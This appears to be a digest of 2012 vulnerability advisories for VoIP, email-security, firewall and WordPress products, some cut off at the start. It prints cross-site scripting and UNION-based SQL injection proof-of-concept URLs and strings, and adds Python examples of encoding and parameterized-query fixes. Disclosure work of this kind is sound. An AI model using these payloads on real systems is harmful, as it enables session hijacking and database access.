;div style=text-align: center; width: 70px; white-space: normal;daily/div/div/tdtd align=centerdiv style=text-align: center; width: 50px; white-space: normal;div style=text-align: center; width: 50px; white-space: normal;No/div/div/tdtd align=center div style=text-align: center; width: 90px; white-space: normal;div style=text-align: center; width: 90px; white-space: normal;Customer/div/div/tdtd align=centerdiv style=text-align: center; width: 90px; white-space: normal; div style=text-align: center; width: 90px; white-space: normal;Active/div/div/tdtd align=centerdiv style=text-align: center; width: 120px; white-space: normal;div style=text-align: center; width: 120px; white-space: normal;a href=http://demo.astpp.org/accounts/payment_process/asdsadfas%20;[PERSISTENT INJECTED SCRIPT CODE]= = class=icon style=text-decoration:none;background-image:url(/images/payment.png); rel=facebox title=ProcessPayment amp;nbsp;lt;/agt;lt;a href=http://demo.astpp.org/accounts/account_detail/asdsadfas

Review: DIDs
li label class=descAccess Number:/label input name=access_number class=text field medium size=20 readonly=readonly type=text[PERSISTENT INJECTED SCRIPT CODE]@108.163.242.106=/iframe input name=id value=11 type=hidden /li li label class=descNote:/label input name=note class=text field medium size=10 type=text[PERSISTENT INJECTED SCRIPT CODE])' =/iframe /li li label class=descStatus:/label select name=status class=select field medium option value=0 selected=selectedACTIVE/option option value=1INACTIVE/option /select

Review: Trunks
td align=centerdiv style=text-align: center; width: 329px; white-space: normal; a href=http://demo.astpp.org/lcr/trunks/edit/;[PERSISTENT INJECTED SCRIPT CODE]' class=icon style= text-decoration:none;background-image:url(/images/page_edit.png); rel=facebox title=Update /aa href=/lcr/trunks/delete/iframe src=a onload=alert(/ class=icon style=text-decoration:none;background-image:url(/images/delete.png); title=Delete onClick=return get_alert_msg(); /a/iframe/a/div/td/tr/tbody/table div style=display: none; class=iDiv/div/div

Review: Taxes
fieldset style=width:585px; legendspan style=font-size:14px; font-weight:bold; color:#000;Taxes Information/span/legend li label class=descPriority:/labelinput class=text field medium value=0 name=taxes_priority size=20 type=text /li li label class=descAmount:/labelinput class=text field medium value=0. name=taxes_amount size=20 type=text /li li label class=descRate(%):/label input class=text field medium value=0. name=taxes_rate size=8 type=text /li li label class=descDescription:/label input class=text field medium type=text[PERSISTENT INJECTED SCRIPT CODE])' = name=taxes_description size=8/iframe /li /fieldset

Risk:
=====
The security risk of the persistent web vulnerabilities is estimated as high(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
NeoBill CMS v0.8 Alpha - Multiple Web Vulnerabilities
://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C
neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=view_log_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3Clog=1

Search:
neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=services_serverssubmit=search_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C

Register Domain:
neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=domains_registersubmit=register_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C

New Domain Service:
neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=services_new_domain_servicesubmit=new_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C

Risk:
=====
1.1 The security risk of the persistent input validation vulnerability is estimated as high.
1.2 The security risk of the non-persistent cross site scripting vulnerabilities is estimated as low(+)|(-)medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Axis VoIP Manager v2.1.5.7 - Multiple Web Vulnerabilities
Title:
======
Axis VoIP Manager v2.1.5.7 - Multiple Web Vulnerabilities

Date:
=====
2012-09-09

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=686

VL-ID:
=====
686

Common Vulnerability Scoring System:
====================================
2.3

Introduction:
=============
Feel free to create Schedules (in PBX Features), Inbound Routes, User Extensions (individually or using Bulk Generator in Extensions Directory), Feature Dial Codes (in PBX Features - Feature Dial Codes), IVR Menus (in PBX Features), ACD Queues, etc.

(Copy of the Vendor Homepage: http://www.axint.net/voip/ )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple cross site scripting vulnerabilities in the Axis VoIP Manager v2.1.5.7.

Report-Timeline:
================
2011-09-07: Public Disclosure

Status:
=======
Unpublished

Affected Products:
==================
Axis
Product: VoIP Manager v2.1.5.7

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple non-persistent cross site scripting vulnerabilities are detected in the Axis VoIP Manager User Portal v2.1.5.7. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user interaction. The bugs are located on the client side in the contact_chooser.cgi and contacts.cgi files with the bound vulnerable lastname, firstname, department, contact or managed_usr application parameters. Successful exploitation results in application account theft, client-side phishing and client-side content request manipulation. Exploitation requires medium or high user interaction and no privileged web application user account.

Vulnerable Module(s):
[+] contact_chooser.cgi
[+] contacts.cgi

Vulnerable Parameter(s):
[+] lastname, firstname & department
[+] contact
[+] managed_usr

Proof of Concept:
=================
The client-side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user interaction and without a privileged application user account. For demonstration or reproduce ...
Selection Filter
https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100type=1type_selector=2lastname=lastname_match=1firstname=firstname_match=1department=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3Cdepartment_match=1action=Select
https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100type=1type_selector=2lastname=lastname_match=1firstname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3Cfirstname_match=1department=department_match=1action=Select
https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100type=1type_selector=2;lastname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3Clastname_match=1firstname=firstname_match=1department=department_match=1action=Select

Contact Chooser
https://voip01.127.0.0.1:5999/asterisk/contact_chooser.cgi?contact=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C

managed_usr - listing
https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?type=2usr=demo-100managed_usr=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3Ctype_selector=2lastname=lastname_match=1firstname=firstname_match=1department=department_match=1action=Select+

Risk:
=====
The security risk of the non-persistent (client-side) cross site scripting vulnerabilities is estimated as low(+)|(-)medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
SonicWALL EMail Security 7.3.5 - Multiple Vulnerabilities
=safeModeNoOfQuarantine size=3 value=iframe src=a [EXECUTE/INJECT PERSISTENT CODE!]) id=safeModeNoOfQuarantine

... or

input type=text name=safeModeNoOfMessageFromOneUser size=3 value=iframe src=a [EXECUTE/INJECT PERSISTENT CODE!]) id=safeModeNoOfMessageFromOneUser

URL: http://esserver.127.0.0.1:8080/virus_config.html

PoC: Compliance Module - Approval Ordner - Listing Exceptions
tbodytrtd background=policy_approval_box_summary-Dateien/nav_bar_background.gif width=24 img src=policy_approval_box_summary-Dateien/clear.gif height=15 width=4/tdtd border=0 background=policy_approval_box_summary-Dateien/nav_bar_background.gifspan class=columnApproval- Ordner/span/tdtd border=0 background=policy_approval_box_summary-Dateien/nav_bar_background.gif span class=columnNachrichten, die eine Genehmigung erfordern/span/tdtd background=policy_approval_box_ summary-Dateien/nav_bar_background.gif /td/trtr td height=12 /td tda href=http://esserver.demo.sonicwall.com/policy_approval_box.html ?pathname=[INJECTED PERSISTENT CODE!]iframe src=policy_approval_box_ summary-Dateien/a.htm [EXECUTION OF PERSISTENT CODE!] = a=/td td0/td tddiv align=rightinput type=button name=delete class=button value=Löschen

URL: http://esserver.127.0.0.1:8080/policy_approval_box_summary.html

1.2 The client-side cross site scripting vulnerability can be exploited by remote attackers with medium required user interaction. For demonstration or reproduce ...

PoC:
http://esserver.127.0.0.1:8080/alert_history.html?from=200%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/alert_history.html [POST REQUEST] row=200%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c

Solution:
=========
The Email Security 7.3.6 patch that addresses this set of issues has now been posted and is available to all of our Email Security customers from the download section of our customer portal (https://www.mysonicwall.com/Firmware/DownloadCenter.aspx).

Risk:
=====
1.1 The security risk of the persistent input validation vulnerabilities is estimated as high(-).
1.2 The security risk of the client-side cross site scripting vulnerabilities is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Fortigate UTM WAF Appliance - Cross Site Vulnerabilities
Title:
======
Fortigate UTM WAF Appliance - Cross Site Vulnerabilities

Date:
=====
2012-09-07

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=559

VL-ID:
=====
559

Common Vulnerability Scoring System:
====================================
3.5

Introduction:
=============
The FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email and Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading network performance. Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide a comprehensive and high-performance array of security and networking functions including:

* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options

FortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including complex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated networking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM) capabilities to separate various networks requiring different security policies.

Fortigate appliances are Pentagon US Military certified. The military provides high security standards to secure outdoor camps, air bases and offices with Fortigate hardware.

(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate )

Abstract:
=========
The Vulnerability-Lab Research Team discovered multiple non-persistent web vulnerabilities in the FortiGate UTM Appliance Application.

Report-Timeline:
================
2012-05-07: Researcher Notification & Coordination
2012-05-10: Vendor Notification
2012-06-08: Vendor Response/Feedback
2012-08-30: Vendor Fix/Patch (FortiOS v4.3.8 B0630; FortiOS v5.0 B064)
2012-09-07: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Fortigate
Product: UTM Firewall Appliance Application vFortiGate-5000 Series; FortiGate-3950 Series; FortiGate-3810A

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple non-persistent input validation vulnerabilities are detected in the FortiGate UTM Appliance Application. The vulnerability allows remote attackers to hijack admin/customer sessions with required user interaction (client-side). Successful exploitation allows attackers to phish user accounts, hijack sessions, redirect client-side requests or manipulate website context in client-side browser requests.

Vulnerable Module(s): (Non-Persistent)
[+] Exception Handling - objusagedlg
[+] WiFi-controller SSID - Topic
[+] Display Message - Title Message

Picture(s):
../1.png
../2.png

Interface - UTM WAF Web Application [Appliance]
FortiGate-5000 Series; FortiGate-3950 Series; FortiGate-3810A; FortiGate-3600A; FortiGate-3016B; FortiGate-1240B; FortiGate-800; FortiGate-620B; FortiGate-311B; FortiGate-310B; FortiGate-300A; FortiGate-224B; FortiGate-200B Series

Proof of Concept:
=================
The non-persistent vulnerability can be exploited by remote attackers with medium or high required user interaction. For demonstration or reproduce ...

Code Review: Exception Handling - objusagedlg
URL: http://appliance.127.0.0.1:137/objusagedlg?type=220mkey=

div style=text-align: center;h2WiFi-controller SSID span class=emphasized_msg[EXECUTES NON-PERSISTENT SCRIPTCODE HERE!]
/span is used by:/h2divTotal References: span id=total_refcount/span/divdiv class=info_msgspan id=total_unused /span object types that may be configured to use this object have no references (span id=unused_toggle/span)/div form name=search_paramsinput name=type value=220 type=hiddeninput name=mkey value= type=hidden iframe src=objusagedlg-Dateien/hack.htm [EXECUTES NON-PERSISTENT SCRIPTCODE HERE!]' =input type=hidden name=mkey_display value= //formdiv id=reftable-container/div

Code Review: Display Message - Title Message
URL: https://appliance.127.0.0.1:137/displaymessage?url=/webfilter/profile/dlgtitle=

td[EXECUTES NON-PERSISTENT SCRIPTCODE HERE!]' = td= /tr /table/td /tr tr td class
GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities
GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities

Review: (listing, truncated at the start)

... <input id="strength" name="strength" value="95" type="hidden">
<input id="secret_hidden" name="secret_hidden" value="" type="hidden">
<input id="allowGenCert" name="allowGenCert" value="1" type="hidden">
<input id="remotePW_hidden" name="remotePW_hidden" value="" type="hidden">
<iframe src="user-list_data/[PERSISTENT SCRIPT CODE!]'" ="></td></tr>
<tr><td>
...
identity
<input class="forminput" id="identity" name="identity" type="text" size="60" maxlength="127" value="<iframe src="[PERSISTENT SCRIPT CODE!] &#34;) /></td></tr>
...
fullName
<td colspan="3"><input class="forminput" id="fullName" name="fullName" type="text" size="60" maxlength="59" value="<iframe src="a [PERSISTENT SCRIPT CODE!]) /></td></tr>
<tr>
...
desc
<td colspan="3"><input class="forminput" id="desc" name="desc" type="text" size="60" maxlength="79" value="<iframe src="a &#34;[PERSISTENT SCRIPT CODE!]) /></td></tr>
...
or the secret_hidden
<input id="strength" name="strength" value="95" type="hidden">
<input id="secret_hidden" name="secret_hidden" value="" type="hidden">[PERSISTENT SCRIPT CODE!])' ="<input id="allowGenCert" name="allowGenCert" type="hidden" value="1" />

URL: http://gta.127.0.0.1/config/accounts/user/user-fs_en_6.0.3

Review: VPN Certificate - Details Listing

<tr><td class="formlabel">Subject:</td>
<td>emailAddress = \"[PERSISTENT SCRIPT CODE!]) , CN = \"[PERSISTENT SCRIPT CODE!]) , O = [PERSISTENT SCRIPT CODE!] , L = [PERSISTENT SCRIPT CODE!]) , ST = [PERSISTENT SCRIPT CODE!]) , C = US, OU = i[PERSISTENT SCRIPT CODE!]) </td></tr>

Note: The vulnerable certificate content can also be exported via the download function to review the problem.

URL: http://gta.127.0.0.1/config/vpn/certs/certs-fs_en_6.0.3

Solution:
=========
Parse (encode) the input field values secret_hidden, remotePW_hidden, identity, desc, fullName and emailAddress. Restrict the name input fields with a special filter when processing, so that strings with tags or characters like (<, >, double quotes & co. ...) are not loaded. Parse also the vulnerable output listing, where the script code is currently executed unsanitized out of the WAF application context.

Note: Your company can use the following public non-malicious string list to verify or update ...
URL: http://www.vulnerability-lab.com/resources/documents/531.txt

Risk:
=====
The vulnerabilities can be exploited with low required user interaction and a privileged user account. The security risk of the persistent input validation vulnerabilities is estimated as medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)

Copyright © 2012 | Vulnerability Laboratory
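The fix the Solution section asks for, written out as an added example (this is not code from the advisory or from the vendor): a small Python renderer that applies an allowlist filter to the name-style fields before they are stored and HTML-encodes every stored value for the context it lands in, so a stored tag is displayed as text rather than parsed. The field names and maxlength values come from the listing above; the function names (validate_name_field, render_user_form, render_cert_subject), the allowlist policy and the sample record are assumptions constructed for the example.

```python
import html
import re

# Length limits taken from the maxlength attributes in the listing above.
MAX_LEN = {"identity": 127, "fullName": 59, "desc": 79}

# Allowlist for name-style fields (assumed policy): letters, digits, space and a
# few punctuation characters. Anything that could open a tag or break out of an
# attribute ('<', '>', '"', "'", '&') is rejected before the value is stored.
NAME_RE = re.compile(r"[A-Za-z0-9 ._@+\-]+")


def validate_name_field(field, value):
    """Return True when value is acceptable for the given name-style field."""
    limit = MAX_LEN.get(field, 127)
    return 0 < len(value) <= limit and NAME_RE.fullmatch(value) is not None


def attr(value):
    """Encode a value for an HTML attribute context (both quote styles escaped)."""
    return html.escape(value, quote=True)


def text(value):
    """Encode a value for HTML element-text context."""
    return html.escape(value, quote=False)


def render_user_form(user):
    """Render the hidden and visible inputs of the user form. Every stored value
    is encoded for the attribute it lands in, including the hidden fields the
    listing shows being abused (secret_hidden, remotePW_hidden)."""
    rows = []
    for name in ("strength", "secret_hidden", "allowGenCert", "remotePW_hidden"):
        rows.append(f'<input id="{name}" name="{name}" value="{attr(user.get(name, ""))}" type="hidden">')
    for name in ("identity", "fullName", "desc"):
        rows.append(
            f'<input class="forminput" id="{name}" name="{name}" type="text" '
            f'maxlength="{MAX_LEN[name]}" value="{attr(user.get(name, ""))}">'
        )
    return "\n".join(rows)


def render_cert_subject(subject):
    """Render a certificate subject (ordered dict of RDN type -> value) into the
    details row, encoding each component for element-text context."""
    parts = [f"{rdn} = {text(value)}" for rdn, value in subject.items()]
    return '<tr><td class="formlabel">Subject:</td><td>' + ", ".join(parts) + "</td></tr>"


# Constructed sample data: the stored values carry the kind of tag the advisory
# describes; after encoding the browser shows them as text.
SAMPLE_USER = {
    "strength": "95", "secret_hidden": "", "allowGenCert": "1", "remotePW_hidden": "",
    "identity": '<iframe src="x">', "fullName": "Alice Example", "desc": 'a "quoted" desc',
}
SAMPLE_SUBJECT = {"emailAddress": "alice@example.test", "CN": "<iframe src=a>", "O": "Example", "C": "US"}

if __name__ == "__main__":
    for field in ("identity", "fullName", "desc"):
        print(field, "accepted" if validate_name_field(field, SAMPLE_USER[field]) else "rejected")
    print(render_user_form(SAMPLE_USER))
    print(render_cert_subject(SAMPLE_SUBJECT))
```

The two encoders are kept separate on purpose: a value inside value="..." needs quotes escaped, while a value between tags only needs the tag and ampersand characters escaped; applying the attribute encoder everywhere is also correct and is the simpler choice when a template engine does not track context for you.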
Switchvox Asterisk v5.1.2 - Multiple Web Vulnerabilities

... the poc press on test CRM Settings
3- Setup - Groups - Create Extension Group [Note]
4- Setup - Outgoing calls - Create Outgoing Call rule [Note]
5- Setup - Incoming Calls - Caller DID routes - Create Single DID Route [Note]
6- Setup - Incoming Calls - Caller ID Rules - Create Call transfer Call [Note]

1. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=modify_sound&sound_id=478

<div class="desc_div"><b>Description:</b> Your new password must be different than your old password. Please try again.<br>[PERSISTENT INJECTED SCRIPT CODE!]<br/>[PERSISTENT INJECTED SCRIPT CODE!])</ifram></iframe></div>

2. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?plugin_name=sugarcrm&admin_sbplugins_id=1&cmd=modify_crm_plugin&sugarcrm=1

[1101],plugin_type:system,plugin_description:Lookup up and display contact information straight from your SugarCRM server.,plugin_display:SugarCRM,plugin_name:sugarcrm,admin_sbplugins_id:1,proxy:http://\[PERSISTENT INJECTED SCRIPT CODE!]) </iframe>,uri:http://\[PERSISTENT INJECTED SCRIPT CODE!])

3. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=extension_groups

<div style="margin-right: 5px; display: none;"><div style="width: 400px;" class="pwm_container_padding"><div>[PERSISTENT INJECTED SCRIPT CODE!]) </iframe>'[PERSISTENT INJECTED SCRIPT CODE!])</iframe>[PERSISTENT INJECTED SCRIPT CODE!]) </iframe>'</iframe></div><div class="clear"></div></div></div></div>
<div style="display: none;" class="pwm_top_arrow"></div><div style="left: 187px; top: 354px;" class="pwm_bottom_arrow"></div>

4. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=add_outgoing_rule

{call_through:{internal:{}},priority:9,name:test,description:\[PERSISTENT INJECTED SCRIPT CODE!])</iframe> \ [PERSISTENT INJECTED SCRIPT CODE!],failovers:{},is_final:0,pattern:Begins with 13 and the remainder is 23 to 90 digits in length,id:103,context_type:USER}],total_items:9}},allExtensions:

5. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=incoming_rules&passthrough=1#pageTab=did_routes

code number:123,name:test,note:\[PERSISTENT INJECTED SCRIPT CODE!])</iframe>,force_fax:0,any_provider:1,type:route_number,id:3,call_type:0}, {priority:2,action:busy,type:catchall_unknown_route,id:1}],total_items:3}},switchvox_version:40062, menu_structure:[{children:[{children:[{cmd:view_extensions,id:manage_extensions,display:Manage},{cmd:extension_groups,id:extension_groups,display:Groups},{cmd:extension_templates,id:extension_templates,display:Templates}, {cmd:extension_permissions,id:extension_permissions,display:Permissions},{cmd:phone_setup,id:extension_phones,display:Phones}, {cmd:extension_settings,id:extension_settings,display:Settings}],id:extensions,column:1,display:Extensions},{children: [{cmd:channel_groups,id:channel_groups,display:Channel Groups},{cmd:voip_providers,id:voip_providers,display:VOIP Providers}, {cmd:outgoing_rules,id:outgoing_calls,display:Outgoing Calls},

6. URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=incoming_rules#pageTab=caller_id_rules

Risk:
=====
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim M. El-Sayed (the StOrM) (st...@vulnerability-lab.com) [http://iel-sayed.blogspot.com]
Better WP Security v3.4.3 Wordpress - Web Vulnerabilities

Title:
======
Better WP Security v3.4.3 Wordpress - Web Vulnerabilities

Date:
=====
2012-08-20

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=691

VL-ID:
======
691

Common Vulnerability Scoring System:
====================================
3.5

Introduction:
=============
... plugin thereby ensuring that as many security holes as possible are patched without having to worry about conflicting features or the possibility of missing anything on your site. With one-click activation for most features as well as advanced features for experienced users Better WP Security can help protect any site.

(Copy of the Vendor Homepage: http://wordpress.org/extend/plugins/better-wp-security/ )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the Better WP Security v3.4.3 Wordpress Application Addon.

Report-Timeline:
================
2012-08-21: Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected in the Better WP Security v3.4.3 Wordpress Application Addon. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user interaction. The bugs are located on the server side in the Limit Login Attempts and Exception Handling Error Intrusion Detection modules, with the bound vulnerable email address and error parameters. Successful exploitation can result in wordpress application account theft, client-side phishing or client-side content request manipulation. Exploitation requires medium or high user interaction without a privileged web application user account.

Vulnerable Module(s):
[+] Better WP Security - Limit Login Attempts Intrusion Detection
[+] Exception Handling Error

Vulnerable Parameter(s):
[+] Email Address
[+] Error

Proof of Concept:
=================
The persistent vulnerability can be exploited by remote attackers with low required user interaction and a low privileged application user account. For demonstration or reproduce ...

Inject the following example string into the application input (persistent) or parameter (client side):

String: <iframe src="http://www.vulnerability-lab.com"></iframe>

Review: Listings

<tr valign="top">
<th scope="row" class="settinglabel">
<label for="ll_emailaddress">Email Address</label>
</th>
<td class="settingfield">
<input id="ll_emailaddress" name="ll_emailaddress" value="\" type="text"> [PERSISTENT INJECTED SCRIPT CODE!])' =" ad...@vulnerability-lab.com="

Review: Exception Handling

<div class="error" style="text-align: center;"><p style="color: red; font-size: 14px; font-weight: bold;">Attention !</p><p> Please add this site now to your <a target="_blank" href="http://managewp.com/wp-admin">ManageWP.com</a> account. Or deactivate the Worker plugin to avoid <a target="_blank" href="http://managewp.com/user-guide/security">security issues</a>. </p></div>
<div id="message" class="error"><p>Login time period needs to be aan integer greater than 0.</p></div>
<div id="message" class="error"><p>\"[PERSISTENT INJECTED SCRIPT CODE!])' =" is= not= a= valid= ip.= p=</p></div>

Solution:
=========
The vulnerabilities can be patched by parsing (encoding) the email address and error exception handling parameters and their output listing.

Risk:
=====
The security risk of the persistent input validation vulnerabilities is estimated as medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Omnistar Mailer v7.2 - Multiple Web Vulnerabilities

... ):
[+] Form Name

Proof of Concept:
=================
1.1
The SQL injection vulnerabilities can be exploited by remote attackers without user interaction. For demonstration or reproduce ...

PoC:
http://127.0.0.1:1337/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#
http://127.0.0.1:1337/mailer/admin/preview.php?id=-2'+union+Select+1--%20-
http://127.0.0.1:1337/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-op=list
http://127.0.0.1:1337/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#
http://127.0.0.1:1337/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-
http://127.0.0.1:1337/mailertest/admin/pages.php?op=edit&id=16&form_id=2'
http://127.0.0.1:1337/mailertest/admin/contacts.php?op=edit&id=3&form_id=2'
http://127.0.0.1:1337/mailertest/users/index.php?profile=1&form_id=2'
http://127.0.0.1:1337/mailertest/users/register.php?form_id=2'

--- SQL Exception ---
SQL error (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''9''' at line 3) in ( select navname,form_id,auto_subscribe,approve_members,confirm_email,signup_redirect,email_forward from mailer75_navlinks where nav_id='9'' )

1.2
The persistent input validation vulnerability can be exploited by remote attackers with low required user interaction and a low privileged user account. For demonstration or reproduce ...

The attacker creates a form and inserts his own malicious javascript or html code into the form name field. To create the form the attacker goes to Customise Interface - Create Website Forms - Create Standard Registration Form - Add form, then injects the malicious script code, i.e.

<iframe src="www.vuln-lab.com" onload="alert("VL")"/>

When a user browses the forms page in the control panel, or any user tries to register for the website, the persistent injected script code is executed out of the web application context.

Risk:
=====
1.1
The security risk of the blind SQL injection vulnerability is estimated as critical.

1.2
The security risk of the persistent input validation vulnerability is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com]
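The query that the SQL exception above exposes, shown beside the parameterized form that closes the hole, as an added example that is not Omnistar code. Python's sqlite3 module stands in for MySQL; the table and column names are the ones in the error message, the rows are constructed, and the function names (lookup_vulnerable, lookup_safe, probe) are assumptions. lookup_vulnerable reproduces the string-concatenation pattern the error reveals; lookup_safe validates the id as an integer and binds it, so the driver never treats the request value as SQL text.

```python
import sqlite3

# Columns are the ones named in the SQL error message quoted above.
SCHEMA = """
CREATE TABLE mailer75_navlinks (
    nav_id INTEGER PRIMARY KEY, navname TEXT, form_id INTEGER, auto_subscribe INTEGER,
    approve_members INTEGER, confirm_email INTEGER, signup_redirect TEXT, email_forward TEXT
);
"""
# Constructed sample rows.
SAMPLE_ROWS = [
    (9, "Newsletter", 2, 1, 0, 1, "/thanks", ""),
    (10, "Updates", 3, 0, 1, 1, "/ok", ""),
]
COLS = "navname,form_id,auto_subscribe,approve_members,confirm_email,signup_redirect,email_forward"


def open_db():
    """In-memory database standing in for the application's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO mailer75_navlinks VALUES (?,?,?,?,?,?,?,?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, nav_id):
    """'Before' form: the request parameter is pasted into the statement text,
    which is exactly what the quoted error message shows (... where nav_id='9'')."""
    sql = f"select {COLS} from mailer75_navlinks where nav_id='{nav_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, nav_id):
    """Hardened form: nav_id is checked to be an integer and bound as a parameter.
    A value that is not an integer is simply 'no such row', not a query error."""
    try:
        nav_id_int = int(nav_id)
    except (TypeError, ValueError):
        return []
    sql = f"select {COLS} from mailer75_navlinks where nav_id=?"
    return conn.execute(sql, (nav_id_int,)).fetchall()


def probe(conn, nav_id):
    """Return ('ok', rows) or ('error', message) for the vulnerable query. The
    error branch is the verbose SQL exception the application leaked to the client;
    a production handler should log it server-side and return a generic message."""
    try:
        return ("ok", lookup_vulnerable(conn, nav_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = open_db()
    print(probe(conn, "9"))        # ('ok', [('Newsletter', ...)])
    print(probe(conn, "9'"))       # ('error', ...) - the stray quote breaks the statement
    print(lookup_safe(conn, "9'")) # [] - treated as data, no error
```

The int() check is the real fix for an id parameter; the bound parameter is what protects a free-text column such as navname, where an allowlist is not possible.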
Interspire Email Marketer v6.0.1 - Multiple Vulnerabilites

... exploitation of the vulnerability can result in account theft, client-side phishing or client-side content request manipulation.

Vulnerable Module(s):
[+] dynamiccontenttags

Vulnerable File(s):
[+] admin/index.php?Page=Addons&Addon=dynamiccontenttags

Vulnerable Parameter(s):
[+] Action

Proof of Concept:
=================
1.1
The SQL injection vulnerability can be exploited by remote attackers without user interaction. For demonstration or reproduce ...

PoC:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Addons&Addon=dynamiccontenttags;Action=Edit&id=-1%27+UNION+Select+1,2,3,4--%20-
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Addons&Addon=dynamiccontenttags;Action=Edit&id=-1%27+UNION+Select+1,version%28%29,3,4--%20-

1.2
The persistent input validation vulnerabilities can be exploited by remote attackers with low or medium required user interaction and a low privileged user account. For demonstration or reproduce ...

1.2.1
The attacker can create a user, injecting malicious code, i.e. <iframe src="http://www.vulnerability-lab.com" onload="alert("VL")"></iframe>, into the Full name field. When the admin views the users the code gets executed. The attacker can also change his full name in the settings, and whenever the admin checks the user list the code gets executed.
URL: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Users&Action=Add

1.2.2
The attacker can create a user group and inject malicious code into the Group name. Whenever the victim lists the user groups, the code gets executed in the victim's browser.
URL: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=UsersGroups&Action=createGroup

1.2.3
